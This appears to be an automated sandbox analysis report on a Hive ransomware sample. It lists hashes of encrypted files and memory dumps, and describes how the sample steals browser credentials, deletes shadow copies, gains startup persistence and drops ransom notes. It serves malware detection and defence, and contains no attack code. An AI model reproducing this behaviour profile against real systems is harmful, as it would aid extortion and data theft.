MD5 b4c70949a62a7356119b5fb8b43c44d7
SHA1 1d36d1023cdb15948211d105c5f74a519f502598
SHA256 079f87216895f0459e196a1c06885803befec97f6460d0797317897a41ca1514
SHA512 39cd64ca7d6b6c2b9de7549d8c32e63842f96da73a39b3bb429b6314dc398069a5dc72cc9e42658aa4723b5cfbc691cbb218b698a05644f702e0dec2b2fba22e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db

MD5 7ed46e1dbf6b169ecf4f7911303c1f51
SHA1 49c8458155776459c110d5729d14793378dab1ca
SHA256 a737f6e2c3edbd10d4cc6b35a741216db5736552dd1ea31fe5c02b3319e1aaf7
SHA512 8aa8e823aa8a9ba4b90bbcf8fb836fd2c1f7aaac35a6232ec93db175395457d09d016a6b362d8a8a59929b5518bfd714382520e6ae9b81b9b2217bee4c33521a

C:\USERS\ADMIN\DESKTOP\MEASUREREVOKE.CSV.CRYPT

MD5 3a97815c55d6047ae2bdc5d8a801c1ce
SHA1 43c32427e15786938bf1f0b48e417caf52cc796a
SHA256 88b0a3fe88d9ddcb1dd5d5ee3c7ece7a42f8154ae4c16e5c98b6ba2444fc77f4
SHA512 4e9994a3cfb946a0f00ac7ee689e77fa6b44a18c6f4b940f752f5040f0e73e38cb8abac8b04dd14de28f693333e6e4465cac68ec98280087650341baa051478a

C:\USERS\ADMIN\DESKTOP\FINDUNREGISTER.HTM.CRYPT

MD5 f20fa0090d67bf7115a2b12ca1e1d630
SHA1 415f1cec7c8bee0c259df1cd4dfd4235b18ba3ca
SHA256 0495ea44c4eabdbd2b233bece767e66c377e26c6cc1a52a40a8c61567b420fff
SHA512 0448869859b6bbf1594da7d1e3a21f4f6fc8529cae87235d4e3013126a83f5abfbf0bb9c779d2f33e322d7bcf0e6ba597a65f8c4958e4a4db2fa6a48c87d2037

C:\USERS\ADMIN\DESKTOP\DESKTOP.INI.CRYPT

MD5 c7d97d7df31fe009e3f88c5df22e190d
SHA1 18b933ca384b63b0cf36325eafb7194b14c21cdc
SHA256 61b4385d49c05c0cd5fc8c0d41cad694516e27604d32a2aab964ef185779f821
SHA512 ced3e6151f719fcc365cd5660ae8ec1c2d036c275e19178301271eb0745524632533319e37c18a103a32b0a446bfea2fa15a131a192259ee4c8dc0b515d26d89

C:\USERS\ADMIN\DESKTOP\DENYUNDO.INI.CRYPT

MD5 ebbdeeba12ac5627c39d5554956f61a1
SHA1 db3dba1b1565bd9b7ae4c96bf551f58f3d118f9e
SHA256 d697fe898717bf177172f66e3d4ebc51be5d53bc120d0b2fb8273e2d49824b83
SHA512 48eb22bd84436bc1d56b2d9407fb1c55d0a3a06ce197e0e54e8a437687bb60757ea947edea9d07090630feb8321ec5275e409640a719f29b16d87c72551cc419

C:\USERS\ADMIN\DESKTOP\CLOSERESTART.DOCX.CRYPT

MD5 3cde3bac81ebbf94a2c91f15373382f1
SHA1 ff38e60f71c20bb6f46b90a9841510c7e3fe432b
SHA256 25fea8c3d1a23b7d2829c56fcf109443c30e9846ce86e563a959c76df39a1671
SHA512 a1541d98dbddfe7921d086c6fadfc243f25b9525a7dda61c5b9572cfc5c053879e9891790acade710f0f992819c30a7bb936deed1c0b1d98d35d24ffaaffd64f

C:\USERS\ADMIN\DESKTOP\BACKUPCONNECT.HTML.CRYPT

MD5 cd1e8c41c0b154b633c67945a9ed55df
SHA1 6fbe866eb5961ae8a8b19908f6698925680d0f94
SHA256 6604aebe28d97caec7b589be926f2286e4f7eef73169a96d9aabe17e5fd6bcae
SHA512 ef405a773c3cf8f4a3b95c2ba7e5d9f0d561286a6f4a583f47c4b6d47a665eaef2b21a264dc0e86741906334ed6e40369301f5ca899b53ce04c054966dc5524f

C:\USERS\ADMIN\DESKTOP\ADDRESTART.PPS.CRYPT

MD5 50f44b4a65455d9a76e97ff26b01c1c1
SHA1 333e5d952096e40ed05a9f560ddd0446f667cc4b
SHA256 fa786a6a556a52be57fd70c3c377cf4be294c8124bd14abc90f9ad56a3bab9e3
SHA512 8ea0e23aff236f5aa2c092d6a61881f410b59e82b3c6f8ad03ebf4833e7caaf184b3ca3b298bea36811ac6854143d8d5b733c230a872fb88ffd0617c895faa03

C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI.CRYPT

MD5 ed50a3740efb5788147ac732cd46e73f
SHA1 49f543bf3e47564eaa3c14d2137f72b80a684be1
SHA256 7a180ada88c8903078fb5332294e9f44975e89349cc99a1de6b8cc8e9b1a3832
SHA512 f8e886fa74d4f49942935b775c23401a027b307712bf89cddbc916c36f87e9a23b10648bb50ab2c188da20351fa0fd8551435ba809269819508e26bd4d3ed668

C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

MD5 2350b47261040b1ee32f7df427ab30fc
SHA1 e656cced405e01b6a60b7444b2c9e1b31ed7c63a
SHA256 612881f476b4820221970c20f44ee5d9cd9c64a2cd3c9ec82e6757209c0184db
SHA512 a9e5838e63c2f786d57fd3e808ed54c6af0f7fc60dcc9cc1d606309d976c1b8954ef6271838db3e20325a6d66889362e3f28825a6fdba5075b860efc43d1d941

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db

MD5 fa81b2d92a9a1e2a097836e9f9538847
SHA1 9db5ddede06dd505dc65d7714d65fdf3490ec6d7
SHA256 f1bb4b9a6febb67ec216afc1ac4af6812096ce832d874b71d23e64e24be12153
SHA512 cfc92b130585cedbd241432b2f0bf2d884cfe18be47df6c49bfb987b5c8d847d1c378df1f822d212b1f3c4401ce53f0f8d6dae4478e2e8bc7bab40d508608225

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin

MD5 0f7dff66a128cced04327977bc7b5e7a
SHA1 d7b4ec941cfc3dec39525b047ca8f02e12061192
SHA256 da07d7603eadcd9d567889527fd3548990260ce623b891acb527486f234807d1
SHA512 45a88d12fedd37014eca03ddf5628fa7c4509270098f2c08412825ac50aeeab37bde8608b8a76a7f8504e6d6b3ad87b676ae69bdffa491620e7d2f2210ff50ae

memory/4040-22264-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

memory/3972-22271-0x000001CFD5E00000-0x000001CFD5F00000-memory.dmp

memory/3972-22269-0x000001CFD5E00000-0x000001CFD5F00000-memory.dmp

memory/3972-22274-0x000001CFD6E20000-0x000001CFD6E40000-memory.dmp

memory/3972-22307-0x000001CFD69E0000-0x000001CFD6A00000-memory.dmp

memory/3972-22308-0x000001CFD7170000-0x000001CFD7190000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\76SX1MLC\microsoft.windows[1].xml

MD5 590d8314f03d3a14c1ea34dfbd0a32b3
SHA1 ef1bdbc9511c1148d218ce77cda9c1b825e8e35f
SHA256 9053535f2c36919721f340cceaa5232bf2666fe4b022a197079d4fa708913acc
SHA512 85bfce822d52aee0edf432a96bad304f4e7fbfd92c7d74be9cf8ca5708c1f1e569d3e192e2c6e6d9c4ab4ef706cc14c05f619b4613cb0ddcfcc4920bac89ceb9

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 cb1f0c7cd627dac6e1aeeeaa2e9d797e
SHA1 ecaffa6a692e92f9c62ae24ffba283e3889b490a
SHA256 3fde4c8669d4d51d1a265161ee912c4ee537875fef98b47942500ef12313dd96
SHA512 cdc1e244e49ae517a3f7748c05d5c09afe194811c989f8e530ac4e61bb3fffeec8591bb4f8eb9fa839277c4dcc540848017e92895d65a447bc539773afe6e49d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133666585176242334.txt

MD5 ecaea544af9da1114077b951d8cb520d
SHA1 5820b2d71e7b2543cf1804eb91716c4e9f732fde
SHA256 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6
SHA512 dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919

memory/3888-22446-0x0000000002130000-0x0000000002131000-memory.dmp

F:\$RECYCLE.BIN\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini

MD5 e0fd7e6b4853592ac9ac73df9d83783f
SHA1 2834e77dfa1269ddad948b87d88887e84179594a
SHA256 feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122
SHA512 289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55

memory/4596-22451-0x0000020AF8B50000-0x0000020AF8C50000-memory.dmp

memory/4596-22452-0x0000020AF8B50000-0x0000020AF8C50000-memory.dmp

memory/4596-22450-0x0000020AF8B50000-0x0000020AF8C50000-memory.dmp

memory/4596-22455-0x0000020AF9970000-0x0000020AF9990000-memory.dmp

memory/4596-22473-0x0000020AF9930000-0x0000020AF9950000-memory.dmp

memory/4596-22487-0x0000020AF9F40000-0x0000020AF9F60000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

MD5 c44f12692cc165e5102eae4a69a51c20
SHA1 11284413f6652dd26d4c584574da1d6774d48ae3
SHA256 930bb47469e49bd56bb9efa6530d5047c9c3b4a34ac708f820a31ad2748c9907
SHA512 6569a528129d10f2dae6e14380e0899a19eec6853789c82bf3465ea7bdfca62f71ae86e738772ed198782b2ee54847ab668b428ee5652b8ede29f88a9bf8396d

memory/5004-22598-0x0000000004030000-0x0000000004031000-memory.dmp

memory/1656-22605-0x000001E4F47D0000-0x000001E4F47F0000-memory.dmp

memory/1656-22618-0x000001E4F4790000-0x000001E4F47B0000-memory.dmp

memory/1656-22631-0x000001E4F4BA0000-0x000001E4F4BC0000-memory.dmp

memory/756-22743-0x00000000046E0000-0x00000000046E1000-memory.dmp

memory/5012-22747-0x000001E851B00000-0x000001E851C00000-memory.dmp

memory/5012-22751-0x000001E852A80000-0x000001E852AA0000-memory.dmp

memory/5012-22774-0x000001E852E50000-0x000001E852E70000-memory.dmp

memory/5012-22760-0x000001E852A40000-0x000001E852A60000-memory.dmp

memory/5012-22746-0x000001E851B00000-0x000001E851C00000-memory.dmp

memory/3984-22888-0x00000000014A0000-0x00000000014A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{CF713EE3-0BF9-4647-9E70-B359D72C9520}.png

MD5 00e5fcfd833151f7cbde607e2f7afeb4
SHA1 55839875c0947aafebff53d22ccc5dad29fe3563
SHA256 b80192aaabe007baecd0603e3ce183e9d554b8a6b0411d20716acfa086ae3035
SHA512 f056777a1987c3becdc217bdc2d82e6aa41086d38fddaa45c42f1726b6f7b7616a10918081650e825a724464ef148b669bc258d38a62e0de8642e2607a0b0de7

memory/4416-22891-0x0000015166700000-0x0000015166800000-memory.dmp

memory/4416-22897-0x00000151676B0000-0x00000151676D0000-memory.dmp

memory/4416-22927-0x0000015167A80000-0x0000015167AA0000-memory.dmp

memory/4416-22913-0x0000015167670000-0x0000015167690000-memory.dmp

memory/4164-23030-0x0000000004B90000-0x0000000004B91000-memory.dmp

memory/1444-23038-0x000002017FB80000-0x000002017FBA0000-memory.dmp

memory/1444-23057-0x000002017FB40000-0x000002017FB60000-memory.dmp

memory/1444-23059-0x000002017FF50000-0x000002017FF70000-memory.dmp

memory/4732-23166-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

memory/3568-23169-0x000001D45CC00000-0x000001D45CD00000-memory.dmp

memory/3568-23175-0x000001D45DC00000-0x000001D45DC20000-memory.dmp

memory/3568-23198-0x000001D45DFC0000-0x000001D45DFE0000-memory.dmp

memory/3568-23187-0x000001D45D9B0000-0x000001D45D9D0000-memory.dmp

memory/4920-23316-0x00000000041F0000-0x00000000041F1000-memory.dmp

memory/3580-23317-0x000001C292500000-0x000001C292600000-memory.dmp

memory/3580-23319-0x000001C292500000-0x000001C292600000-memory.dmp

memory/3580-23322-0x000001C293460000-0x000001C293480000-memory.dmp

memory/3580-23334-0x000001C293420000-0x000001C293440000-memory.dmp

memory/3580-23351-0x000001C293820000-0x000001C293840000-memory.dmp

memory/3580-23318-0x000001C292500000-0x000001C292600000-memory.dmp

memory/4496-23461-0x0000000003F60000-0x0000000003F61000-memory.dmp

memory/1348-23464-0x0000021B51C00000-0x0000021B51D00000-memory.dmp

memory/1348-23469-0x0000021B52B60000-0x0000021B52B80000-memory.dmp

memory/1348-23495-0x0000021B52F20000-0x0000021B52F40000-memory.dmp

memory/1348-23484-0x0000021B52B20000-0x0000021B52B40000-memory.dmp

memory/572-23604-0x00000000040D0000-0x00000000040D1000-memory.dmp

memory/400-23612-0x000001E013600000-0x000001E013620000-memory.dmp

memory/400-23627-0x000001E0133C0000-0x000001E0133E0000-memory.dmp

memory/400-23637-0x000001E0139D0000-0x000001E0139F0000-memory.dmp

memory/1548-23745-0x0000000004290000-0x0000000004291000-memory.dmp

memory/3200-23753-0x0000019DECD70000-0x0000019DECD90000-memory.dmp

memory/3200-23774-0x0000019DECD30000-0x0000019DECD50000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

143s

Max time network

21s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware


Hive

ransomware hive

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Boot or Logon Autostart Execution: Print Processors

persistence

Description Indicator Process Target
File created C:\Windows\System32\spool\prtprocs\x64\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.2bFe2RNXl41EgVSI0NCD79mtp4bWMw5hTIxI97N3WUM.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TWVGEE8A\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-2212144002-1172735686-1556890956-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CGY9ZAGI\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U42VY3XA\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
